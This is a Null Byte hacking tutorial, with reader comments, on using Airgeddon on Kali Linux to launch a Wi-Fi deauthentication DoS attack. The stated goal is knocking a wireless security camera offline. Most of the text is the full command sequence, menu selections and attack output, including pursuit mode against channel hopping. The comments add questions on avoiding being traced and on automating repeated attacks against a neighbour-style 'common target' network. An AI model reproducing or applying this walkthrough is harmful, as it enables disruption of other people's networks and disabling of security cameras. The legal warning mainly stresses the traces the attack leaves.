How to Hack Wi-Fi: Build a Software-Based Wi-Fi Jammer with Airgeddon

Build a Software-Based Wi-Fi Jammer with Airgeddon

Airgeddon is a multi-Bash network auditor capable of Wi-Fi jamming. This capability lets you target and disconnect devices from a wireless network, all without joining it. It runs on Kali, and we'll cover installing, configuring, and using its jamming functionalities on a small, inexpensive Raspberry Pi. When done correctly, it will deny service to a wireless network for up to several blocks.

Airgeddon has been covered as a useful tool many times on Null Byte, but in this guide, I want to show how electronic warfare techniques, such as jamming, can be used by hackers to disable devices such as wireless security cameras.

Electronic warfare is a fairly new concept. Communications like GPS and Wi-Fi make more complex processes — and our way of life — possible. There are many ways to attack systems like drones (UAVs) or networked security cameras, but their data connection is often the most vulnerable.

Electronic warfare favors avoiding engaging these systems directly, instead choosing to disrupt and manipulate the data connection these automated devices rely on. Without a reliable connection, these devices often cease to function or revert to predictable and exploitable default behaviors.

The Electronic Warfare Approach for Hackers

Electronic warfare has been at the heart of some high-profile incidents. For instance, the American military has invested heavily in automation with UAV programs, only to have adversaries like the Iranians develop tactics to disrupt these systems. By jamming the control signals of a top-secret U.S. spy drone while feeding it false GPS data, Iran was able to capture the drone by tricking it into landing in the wrong location.

The Russian military has also invested heavily in jamming and electronic warfare innovation as a means of making American devices useless. Russia even demonstrated the ability to disable a U.S. warship during a flight which knocked out the ship's power.

The majority of these powerful attacks are hardware-based and require devices that would be illegal or expensive to own. Fortunately, not all techniques rely on hardware. Today, we will focus on software-based attacks anyone with Kali Linux can employ.

U.S. Army field manual on selecting targets for electronic warfare. Image via US Army Electronic Warfare Manual

The Wi-Fi DoS De-Authentication Attack

The "jamming" we are using, in this context, is one of many possible denial-of-service (DoS) attacks against a Wi-Fi network. Rather than overpowering the signal like a hardware jammer, a software jammer functions by forging network packets to request continually that all devices in range disconnect themselves. The process is described below.

This attack has the advantage of being effective against any Wi-Fi network, without needing to be authenticated to the network or know the password.

What de-authenticating a target looks like.

How to Jam a Wireless IP Security Camera

In our scenario today, we want to disable a wireless IP security camera connected to a network called "HAZELBEAR." Our target security camera relies on a Wi-Fi connection to stream video to a server. To disrupt that, we will kick all devices off of "HAZELBEAR" with Airgeddon. This will disable the camera from streaming video to whoever is watching or recording.

What You Need to Get Started

Airgeddon runs on Kali Linux. You can use an installation running on a virtual machine or a regular computer with Kali as the main OS. Alternatively, you could use Airgeddon on a $35 Raspberry Pi to create a small portable option. If you'd like to run it on the Pi, check out our guide to setting up Kali Linux on the Raspberry Pi.

It doesn't cost much to be a cool guy. Image by Kody/Null Byte

This tutorial will focus on installing Airgeddon on Kali Linux. Other operating systems it works on include Wifislax, Backbox, Parrot, BlackArch, and Cyborg Hawk. Since Airgeddon is a multi-Bash script and relies on opening multiple windows, it will not work over SSH. You should be connected via HDMI or VNC.

An Atheros AR9271, or another Kali-compatible wireless network adapter, must be capable of being put into monitor mode and packet injection. There are many options to choose from, but the better the wireless adapter's range, the better your results will be.

Step 1: Install Airgeddon

First, let's check your configuration. Kali Linux must be fully updated running Kali Rolling to ensure system needs and dependencies are current. Your wireless adapter capable of monitor mode must be plugged in and recognized by Kali, seen by typing iwconfig or ifconfig in a terminal window. Again, you must be using the Kali Linux GUI, not the command line via SSH.

To install Airgeddon on Kali Linux and similar systems, run the following command in the terminal to clone the git repository.

~$ git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Cloning into 'airgeddon'...
remote: Enumerating objects: 111, done.
remote: Counting objects: 100% (111/111), done.
remote: Compressing objects: 100% (83/83), done.
remote: Total 8015 (delta 58), reused 76 (delta 26), pack-reused 7904
Receiving objects: 100% (8015/8015), 31.93 MiB | 10.49 MiB/s, done.
Resolving deltas: 100% (5030/5030), done.

Once downloaded, navigate to the newly downloaded Airgeddon folder.

~$ cd airgeddon
~/airgeddon$

Then, start the script for the first time.

~/airgeddon$ sudo bash airgeddon.sh

*********************************** Welcome ************************************
Welcome to airgeddon script v10.31

                  .__                         .___  .___
           _____  |__|______  ____   ____   __| _/__| _/____   ____
           \__  \ |  \_  __ \/ ___\_/ __ \ / __ |/ __ |/  _ \ /    \
            / __ \|  ||  | \/ /_/  >  ___// /_/ / /_/ (  <_> )   |  \
           (____  /__||__|  \___  / \___  >____ \____ |\____/|___|  /
                \/         /_____/      \/     \/    \/           \/

                             Developed by v1s1t0r

                        *         .  _.---._          .
                              *    .'       '.  .
                               _.-~===========~-._ *
                           .  (___________________)       *
                            *       \_______/        .

*********************************** Welcome ************************************
This script is only for educational purposes. Be good boyz&girlz!
Use it only on your own networks!!

Accepted bash version (5.1.0(1)-rc2). Minimum required version: 4.2

Root permissions successfully detected

Detecting resolution... Detected!: 1920x1080

Known compatible distros with this script:
"Arch" "Backbox" "BlackArch" "CentOS" "Cyborg" "Debian" "Fedora" "Gentoo" "Kali"
"Kali arm" "Manjaro" "Mint" "OpenMandriva" "Parrot" "Parrot arm" "Pentoo"
"Raspbian" "Red Hat" "SuSE" "Ubuntu" "Wifislax"

Detecting system...
Kali Linux

Let's check if you have installed what script needs
Press [Enter] key to continue... ENTER

After hitting Enter to continue, Airgeddon will check for any updates or missing dependencies, and it does this each time you run it.

Essential tools: checking...
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional tools: checking...
bettercap .... Ok
ettercap .... Ok
hostapd-wpe .... Ok
iptables .... Ok
dnsspoof .... Ok
aireplay-ng .... Ok
bully .... Ok
pixiewps .... Ok
dhcpd .... Ok
asleap .... Ok
packetforge-ng .... Ok
hashcat .... Ok
wpaclean .... Ok
hostapd .... Ok
etterlog .... Ok
tshark .... Ok
mdk4 .... Ok
wash .... Ok
sslstrip .... Error (Possible package name : sslstrip)
hcxdumptool .... Ok
reaver .... Ok
hcxpcapngtool .... Ok
john .... Ok
crunch .... Ok
beef .... Ok
lighttpd .... Ok
openssl .... Ok

Update tools: checking...
curl .... Ok

Your distro has the essential tools but it hasn't some optional. The script can
continue but you can't use some features. It is recommended to install missing tools

Due to the auto install missing dependencies plugin, airgeddon could try to
install the necessary missing packages. Do you want to proceed with the
automatic installation? [Y/n] n

Some optional dependencies being marked as missing is fine for this tutorial. The fully updated version of Kali Linux should have all of the essential tools. You can hit Y if you want to try and install the missing items or just hit N to continue. Then hit Enter a few more times so it can check for the latest script.

> n
Press [Enter] key to continue... ENTER

The script will check for internet access looking for a newer version.
Please be patient...

The script is already in the latest version. It doesn't need to be updated
Press [Enter] key to continue... ENTER

Step 2: Select Your Attack Interface

The next screen will give you a list of attached wireless cards. Select the attack interface by typing the number to the left of it, and you will be taken to the main menu.

***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Intel Corporation 82540EM
2.  wlan0 // Chipset: Atheros Communications, Inc. AR9271 802.11n
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of
Translation", means the translation has been automatically generated and is
still pending of review
---------
> 2

Our interface is in managed mode, and we have not yet selected a target. Managed mode means the card cannot inject packets, which renders our attack impossible. We will need to put our card into "monitor mode" in the next step.

***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake/PMKID tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If your Linux is a virtual machine, it is possible that integrated wifi
cards are detected as ethernet. Use an external usb wifi card
---------
>

Step 3: Set Your Wireless Card to Monitor Mode

Ready the attack interface by typing 2 to select the third option, and follow the prompt to put your card into monitor mode. This allows us to inject forged packets which will convince target devices on the network to disconnect. Hit Enter to continue.

> 2
Setting your interface in monitor mode...

The interface changed its name while setting monitor mode. Autoselected

Monitor mode now is set on wlan0mon
Press [ENTER] key to continue... ENTER

Next, select option 4 to bring up the DoS attack menu.

***************************** airgeddon main menu ******************************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz, 5Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake/PMKID tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* Thanks to the plugins system, customized content can be developed.
Custom modifications of any menu or functionality in a quick and simple way.
More information at Wiki: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Plugins%20System
> 4

Step 4: Identify the Target AP

We can now identify and select our target. Enter option 4 and press Enter to begin scanning for access points.

******************************* DoS attacks menu *******************************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz, 5Ghz

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
------------- (monitor mode needed for attacks) --------------
5.  Deauth / disassoc amok mdk4 attack (mdk4)
6.  Deauth aireplay attack
7.  WIDS / WIPS / WDS Confusion attack (mdk4)
-------- (old "obsolete/non very effective" attacks) ---------
8.  Beacon flood attack (mdk4)
9.  Auth DoS attack (mdk4)
10. Michael shutdown exploitation (TKIP) attack (mdk4)
---------
*Hint* The natural order to proceed in this menu is usually: 1-Select wifi card 2-Put it
in monitor mode 3-Select target network 4-Start attack
---------
> 4

It then checks to make sure you're in monitor mode and lets you know that you can stop the scan using Control-C on your keyboard, which you might want to use since it can scan for a while. Press Enter to continue.

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)

Selected interface wlan0mon is in monitor mode. Exploration can be performed

No filters enabled on scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue... ENTER

In this exercise, we will be attempting to find and disconnect clients from a network called HAZELBEAR. Press Control-C to stop the scan once it has run for a minute or two to gather some networks. While this happens, a target list will appear. It's important to let this scan run long enough to find networks with attached clients, which are marked in the list with an asterisk.

******************************** Select target ********************************

  N.         BSSID       CHANNEL  PWR    ENC      ESSID
--------------------------------------------------------------------------------
  1)  █████████████████     ██    ████  ██████  █████████████████████
  2)  █████████████████     ██    ████  ██████  ██████████████
  3)  █████████████████     ██    ████  ██████  █████████████████████████████
  4)  █████████████████     ██    ████  ██████  █████████████████████████████
  5)  █████████████████     ██    ████  ██████  █████████████████████████████
  6)  █████████████████     ██    ████  ██████  █████████████████████████████
  7)  █████████████████     ██    ████  ██████  █████████████████████████████
  8)  █████████████████     ██    ████  ██████  █████████████████████
  9)  █████████████████     ██    ████  ██████  █████████████████████
 10)  00:21:2F:37:B5:C0      6     72%    WPA2  HAZELBEAR
 11)  █████████████████     ██    ████  ██████  ████████████████
 12)  █████████████████     ██    ████  ██████  █████████████████████

(*) Network with clients
--------------------------------------------------------------------------------
Select target network:
> 10

When we have identified our target network and confirmed there are clients present, we will select the target network by typing its menu number. This will load the parameters and enable the attack options menu.

Step 5: Select Your Attack Option

Select your attack option by typing the number next to it. In this case, we will proceed with attack 5, a "de-authentication / disassociation amok mdk3" attack. This uses the MDK3 took to send de-authentication and disassociation packets in "amoc mode." Other options are using the Aireplay tool for spamming de-authentication packets to targets, and overwhelming the target with WIDS / WIPS / WDS confusion attacks to flood the target with traffic.

Press Enter to load the attack method you selected.

******************************* DoS attacks menu *******************************
Interface wlan0mon selected. Mode: Monitor. Supported bands: 2.4Ghz, 5Ghz
Selected BSSID: 00:21:2F:37:B5:C0
Selected channel: 10
Selected ESSID: HAZELBEAR
Type of encryption: WPA2

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
------------- (monitor mode needed for attacks) --------------
5.  Deauth / disassoc amok mdk4 attack (mdk4)
6.  Deauth aireplay attack
7.  WIDS / WIPS / WDS Confusion attack (mdk4)
-------- (old "obsolete/non very effective" attacks) ---------
8.  Beacon flood attack (mdk4)
9.  Auth DoS attack (mdk4)
10. Michael shutdown exploitation (TKIP) attack (mdk4)
---------
*Hint* The natural order to proceed in this menu is usually: 1-Select wifi card 2-Put it
in monitor mode 3-Select target network 4-Start attack
---------
> 5

At this point, our target parameters are loaded. The attack is configured, and we are ready to launch the attack. Use Y to enable "DoS pursuit mode," and hit Enter.

***************************** mdk4 amok parameters *****************************
Deauthentication / Disassociation mdk4 attack chosen (monitor mode needed)

Selected interface wlan0mon is in monitor mode. Attack can be performed

BSSID set to 00:21:2F:37:B5:C0

Channel set to 10

Do you want to enable "DoS pursuit mode"? This will launch again the attack if
target AP change its channel countering "channel hopping" [Y/n]

> y

You can now fire at will. So hit Enter one more time to start the attack.

***************************** mdk4 amok action *****************************
All parameters set

DoS attack with the "DoS pursuit mode" enabled will start when you press [Enter]
on this window. To stop it you must press [Ctrl-C] or close attack window

Press [Enter] key to start attack... ENTER

When you press Enter, a window will open showing the progress of the attack.

***************************** mdk4 amok attack *****************************

Periodically re-reading blacklist/whitelist every 3 seconds

Disconnecting FF:FF:FF:FF:FF:FF from 00:21:2F:37:B5:C0 on channel: 10
Packets sent:     49 - Speed:    40 packets/sec
Disconnecting 68:A8:6D:4D:65:96 and: 00:21:2F:37:B5:C0 on channel: 10
Packets sent:     64 - Speed:    30 packets/sec
Disconnecting 68:A8:6D:4D:65:96 and: 00:21:2F:37:B5:C0 on channel: 10
Packets sent:     76 - Speed:    42 packets/sec

You will see this window open while the attack is active and running. At this point, all targets on the network should lose connection and be unable to reconnect automatically.

Looks like I'm having some network trouble.

If everything were done correctly, clients would not be able to connect to the network, and service is denied to the camera and the laptop viewing the video stream. The camera will be disabled, as well as any connected devices which depend on the wireless internet.

Warnings: DoS Is a Crime & Airgeddon Leaves Traces

Like any other DoS attack, this could be considered a crime depending on how you use it and if you have permission to audit the internet you are targeting. If not, be aware this attack will leave logs in the router that can be retrieved to determine the time and place of the attack, the MAC address involved, and other information that can easily be used to identify you through nearby security cameras or cell tower logs.

Airgeddon targeting an entire network in a classroom setting. Image by Kody/Null Byte

This has been a high-level demonstration of jamming a target and applying electronic warfare techniques to hacking. Stay tuned for more! You can ask me questions here or @kodykinzie on Twitter.

Want to start making money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.

Buy Now (90% off) >

Other worthwhile deals to check out:

Cover photo and screenshots by Kody/Null Byte

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

27 Comments

Love the mannequins design

how can i find out a security camera is wireless or no ?

Look to see if it's plugged into data

Many of them run POE though.

@Alexandru go by signal strength using a tool like Wigle with your Android phone eg is there a wireless signal and is it getting stronger the closer you get to the camera. Got a good signal? Lookup the MAC address to confirm make and model. NOTE: that a trained CCTV operator will spot you quickly or even far worse the system is running recognition and will snag you even in disguise.

Thank you for your tutorials.
Sadmin, is it ok if I translate your posts into Korean and post it on a blog that I am going to create?

It is so hard to find information in Korean so I thought that your posts would help Korean's who are not fluent in English.

I will make sure to cite the source.
thx

This should be okay. I sent you an email.

Thank you. Worked like a charm.

??????? Are you a Korean?
???. Me too.

Come on, why doesn't Korean get recognized?

On the first command installing the program it asks for user and password.what are they???

Your computer's user name and password
root and toor maybe?

I'm actually getting the same problem. It's asking for a username and password for Git Hub.

D'oh! Never mind! I was trying to type the address in manually, when I should have just copy/pasted from the guide.

hello

Im doing a security audit on my home network. After I preform this attack, would I have to reset the router? Or as soon as I stop Airgeddon the De-authentication requests would stop and data flow would return to normal?

Great Turtorial!
-Sector Mellow

Hey Sector Mellow,

Yes, when you stop the attack, data flow should return to normal

Typo on step 3 says, "Ready the attack interface by typing "3" to select the third option, and follow the prompt to put your card into monitor mode."

Option 3 is managed mode.
It's actually option 2 for monitoring mode so you would type "2".
Just saying..
Don't hack me please.

is basically just mdk3 nothing new here

how would a raspberry pi and an alfa leave informations that can trace us back? no internet used, and the mac adress of a rpi have no signature that will identify a person. without being a part of the local environment, everything is done remotely and if done for one hour, after that a person stop to attack and some info will be stored in the log of the router probably but what more? people could be traced just when they are making the attack but not after ?right or not? because the ip of the card or everything else can be modified few seconds later?

I can think of 2 to 3 ways off the top of my head of how you would get caught but prefer not to list them. Excluding those methods I would not be surprised if some IDS systems extend to the RF realm...

Whats with that naked white mannequin behind in the banner
Is it Null Byte Admin's logo?

Daaamn ! This is a good tutorial!

when i try to use airgeddon on my kali raspberry pi i get the following message

"A graphical X window system has not been detected. If you already have one, chec k it's working properly. It's essential for airgeddon. The script can't continue"

can anyone lend a hand? I've been digging through and can't find the proper command to setup the graphical x window.

Thanks

why when i type the clone line, it just hangs up and does nothing? im connected to internet.

Hi, wonderful tutorial. I have everything working well, but I'm wondering if possible how I would make a 1-click script/shortcut I can add to my Kali homescreen that will set an airgeddon DOS attack on a specific network planned in advance.

Example- SSID "nuisancejerk" with MAC 12:34:56:78:90 is my common target for option 5, deauth/dissoci amok mk3 attack. But it takes a minute or so for me to open airgeddon, pass the welcome screen, select wireless card, monitor mode, survey my target, press Y for pursuit mode, and press enter a couple of times.

Is it possible to create a script/shortcut that I could place on my home screen that automatically enters the above options for me?

Kali Linux running on Rpi 3B+
I'm new to Linux altogether, so any help would be much appreciated!

Share Your Thoughts

  • Hot
  • Latest